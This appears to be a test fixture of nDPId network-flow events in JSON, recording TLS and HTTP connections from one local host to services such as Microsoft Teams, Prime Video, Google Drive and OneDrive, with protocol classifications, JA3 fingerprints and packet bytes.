-00661{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1646482916232,"flow_last_seen":1646482916249,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.65.82.67","src_port":52070,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {}} -00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1646482916232,"flow_last_seen":1646482916249,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.65.82.67","src_port":52070,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00824{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482866432,"flow_last_seen":1646482866473,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":494,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"104.23.98.190","src_port":39934,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Pastebin","breed":"Potentially Dangerous","category":"Download"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1646482785304,"flow_last_seen":1646482785442,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4008,"flow_avg_l4_payload_len":501,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.131.169.91","src_port":51248,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Tuenti","breed":"Acceptable","category":"VoIP"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482724450,"flow_last_seen":1646482724472,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.66.196.102","src_port":51806,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.SoundCloud","breed":"Fun","category":"Music"}} -00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482634412,"flow_last_seen":1646482634459,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":494,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"172.65.251.78","src_port":53998,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GitLab","breed":"Fun","category":"Collaborative"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1646483012464,"flow_last_seen":1646483013011,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5436,"flow_avg_l4_payload_len":604,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"40.97.160.2","src_port":39828,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1646482786097,"flow_last_seen":1646482786234,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4008,"flow_avg_l4_payload_len":501,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.131.170.91","src_port":39302,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Tuenti","breed":"Acceptable","category":"VoIP"}} -00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482753482,"flow_last_seen":1646482753526,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.1.66.79","src_port":48140,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.CNN","breed":"Safe","category":"Web"}} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482772264,"flow_last_seen":1646482772325,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"185.125.190.21","src_port":42884,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.UbuntuONE","breed":"Acceptable","category":"Cloud"}} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646495650748,"flow_last_seen":1646495650748,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495650748,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"52.113.194.132","src_port":57878,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1646495650748,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646495650748,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8GIFAAEAGaR3AqAGANHHChOIWAbvSHIRRAAAAAKAC+vCUIQAAAgQFtAQCCApnoF3vAAAAAAEDAwc="} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":463,"source":"sites.pcapng","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1646495650768,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1646495650768,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA0H0NAAHQGLmM0ccKEwKgBgAG74hatJvO00hyEUoAS\/\/\/a2QAAAgQFoAEDAwgBAQQC"} -01153{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":464,"source":"sites.pcapng","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1646495650768,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":571,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":571,"pkt_l4_len":537,"thread_ts_msec":1646495650768,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAItGINAAEAGZyrAqAGANHHChOIWAbvSHIRSrSbztVAYAfbGZQAAFgMBAgABAAH8AwO6eoC9IxGTkdV9vVeJGWk4znzi7kZuVq2WW+Nl\/2Sg0SCU+jy21h8ySE7r\/PfMeW\/+6AejiqSkX1JQLDj\/qy1dewAgSkoTARMCEwPAK8AvwCzAMMypzKjAE8AUAJwAnQAvADUBAAGTCgoAAAAAABUAEwAAEHRlYW1zLm9mZmljZS5jb20AFwAA\/wEAAQAACgAKAAjKygAdABcAGAALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAADQASABAEAwgEBAEFAwgFBQEIBgYBABIAAAAzACsAKcrKAAEAAB0AIP361tTnT+5yNMG5uzlpGoadVy4F1\/ksgWxYfkq0hvgPAC0AAgEBACsABwYaGgMEAwMAGwADAgACRGkABQADAmgyWloAAQAAFQDHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":464,"source":"sites.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646495650748,"flow_last_seen":1646495650768,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646495650768,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"52.113.194.132","src_port":57878,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"teams.office.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} -01176{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":467,"source":"sites.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1646495650748,"flow_last_seen":1646495650804,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4443,"flow_avg_l4_payload_len":740,"midstream":0,"thread_ts_msec":1646495650804,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"52.113.194.132","src_port":57878,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"teams.office.com","server_names":"teams.office.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"104071bf77c5f0d7bae5f17542ba9428","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=Microsoft Corporation, CN=Microsoft RSA TLS CA 01","subjectDN":"CN=teams.office.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2","fingerprint":"27:20:65:85:4C:34:BF:09:F0:25:56:B8:50:A7:4D:38:8C:45:82:80"}} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":470,"source":"sites.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646495669804,"flow_last_seen":1646495669804,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495669804,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"108.138.185.106","src_port":33664,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":470,"source":"sites.pcapng","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1646495669804,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646495669804,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8GxZAAEAGN4nAqAGAbIq5aoOAAbvmWe+jAAAAAKAC+vCvxQAAAgQFtAQCCAqEU9WfAAAAAAEDAwc="} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":471,"source":"sites.pcapng","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1646495669812,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646495669812,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8yYIAAPcGEhxsirlqwKgBgAG7g4CERzW35lnvpKAS\/\/\/nPAAAAgQFoAQCCArIqUDThFPVnwEDAwg="} -01164{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":472,"source":"sites.pcapng","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1646495669817,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646495669817,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5GxhAAEAGNYrAqAGAbIq5aoOAAbvmWe+khEc1uIAYAfZdLwAAAQEICoRT1avIqUDTFgMBAgABAAH8AwN96ffJWUDTazcjPKRqPmlOCDA7EP6e0q+5Knlqzgn4siDXwLeA2RnsV46x7ZH7OaLw+Chjc3EP4ZBJc+xWJC0l1wAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAXABUAABJ3d3cucHJpbWV2aWRlby5jb20AFwAA\/wEAAQAACgAOAAwAHQAXABgAGQEAAQEACwACAQAAIwAAABAADgAMAmgyCGh0dHAvMS4xAAUABQEAAAAAACIACgAIBAMFAwYDAgMAMwBrAGkAHQAgGExhTuOW51jqeKeMnZIkirN5TNVDUu2atdTJKyWyDBgAFwBBBNa6zHPDKyGGZ8TLrmG8xe75hAb+vBq5zYOy2EFwzMFPukEZchYJ5onOljVZmDEEihxmPvbweI2eyfjNpyF4jCAAKwAFBAMEAwMADQAYABYEAwUDBgMIBAgFCAYEAQUBBgECAwIBAC0AAgEBABwAAkABABUAhAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":472,"source":"sites.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646495669804,"flow_last_seen":1646495669817,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646495669817,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"108.138.185.106","src_port":33664,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonVideo","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.primevideo.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00946{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":473,"source":"sites.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646495669804,"flow_last_seen":1646495669824,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1646495669824,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"108.138.185.106","src_port":33664,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonVideo","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.primevideo.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":474,"source":"sites.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646495697787,"flow_last_seen":1646495697787,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495697787,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.185.142","src_port":56458,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":474,"source":"sites.pcapng","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1646495697787,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646495697787,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8TvVAAEAG4RXAqAGAjvq5jtyKAbuisGnHAAAAAKAC+vDU+wAAAgQFtAQCCAq56si5AAAAAAEDAwc="} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":475,"source":"sites.pcapng","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1646495697803,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646495697803,"pkt":"PKn0qB\/spJGxgjQ5CABFgAA8kPwAAHIGrI6O+rmOwKgBgAG73IpV9E4KorBpyKAS\/\/903wAAAgQFlgQCCAoX\/J8euerIuQEDAwg="} -01168{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":476,"source":"sites.pcapng","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1646495697805,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646495697805,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5TvdAAEAG3xbAqAGAjvq5jtyKAbuisGnIVfROC4AYAfb\/+QAAAQEICrnqyMsX\/J8eFgMBAgABAAH8AwMm2R5Ju93q7BO1hUBCbI67+PD2u7\/isSvjCgLKpqok\/yCAWXfAe1hCLkH2e7v9afeyqpqQSwrsncirtbeBJ9H19AAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAVABMAABBkcml2ZS5nb29nbGUuY29tABcAAP8BAAEAAAoADgAMAB0AFwAYABkBAAEBAAsAAgEAACMAAAAQAA4ADAJoMghodHRwLzEuMQAFAAUBAAAAAAAiAAoACAQDBQMGAwIDADMAawBpAB0AIN3ozE7d4X5ID5WvLeFvcVfA+y6MygI54w6MzPaYwOcyABcAQQTFpbayzL1z3QPN8cTTIDg5o4CXfe8\/xuT5UCf9QOlCuSljPogKq5ahl7f7neEgUhdrgF5Z8PWW8a+71cG5NS4HACsABQQDBAMDAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAQAcAAJAAQAVAIYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00903{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":476,"source":"sites.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646495697787,"flow_last_seen":1646495697805,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646495697805,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.185.142","src_port":56458,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleDrive","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"drive.google.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00944{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":477,"source":"sites.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646495697787,"flow_last_seen":1646495697827,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":483,"midstream":0,"thread_ts_msec":1646495697827,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.185.142","src_port":56458,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleDrive","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.3","client_requested_server_name":"drive.google.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":478,"source":"sites.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646495710343,"flow_last_seen":1646495710343,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495710343,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.81.118.91","src_port":33102,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":478,"source":"sites.pcapng","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1646495710343,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646495710343,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8tchAAEAGPx\/AqAGADVF2W4FOAbtTwyfkAAAAAKAC+vBryAAAAgQFtAQCCAom4HXhAAAAAAEDAwc="} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":479,"source":"sites.pcapng","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1646495710376,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1646495710376,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA0mxFAAG4GK94NUXZbwKgBgAG7gU7a1m2vU8Mn5YAS\/\/\/iBwAAAgQFoAEDAwgBAQQC"} -01150{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":480,"source":"sites.pcapng","alias":"nDPId-test","flow_id":41,"flow_packet_id":3,"flow_last_seen":1646495710381,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":571,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":571,"pkt_l4_len":537,"thread_ts_msec":1646495710381,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAIttcpAAEAGPSzAqAGADVF2W4FOAbtTwyfl2tZtsFAYAfZlCgAAFgMBAgABAAH8AwMcPgJU1zrnl+hPKuEgTOmCA8DSxG0x4ZP+nrnS1ukwmSB2tLYK4RsCmYHQ+tv7RzCytXVHC3ipih0buXJEGgMzzAAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAARAA8AAAxvbmVkcml2ZS5jb20AFwAA\/wEAAQAACgAOAAwAHQAXABgAGQEAAQEACwACAQAAIwAAABAADgAMAmgyCGh0dHAvMS4xAAUABQEAAAAAACIACgAIBAMFAwYDAgMAMwBrAGkAHQAgkhEItWzjEiug\/WBaiPCJVLwOMCFSobcq6gZ3ZM5d7hUAFwBBBKUDUTjCPdZ8Ll1S+z857hqnZsJZ3Vatea3adXIfU3XxBdTrso0nY7PLm8teDMagz\/bdRE3yXoqXxIphrdW4ROsAKwAFBAMEAwMADQAYABYEAwUDBgMIBAgFCAYEAQUBBgECAwIBAC0AAgEBABwAAkABABUAigAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00890{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":480,"source":"sites.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646495710343,"flow_last_seen":1646495710381,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646495710381,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.81.118.91","src_port":33102,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"onedrive.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 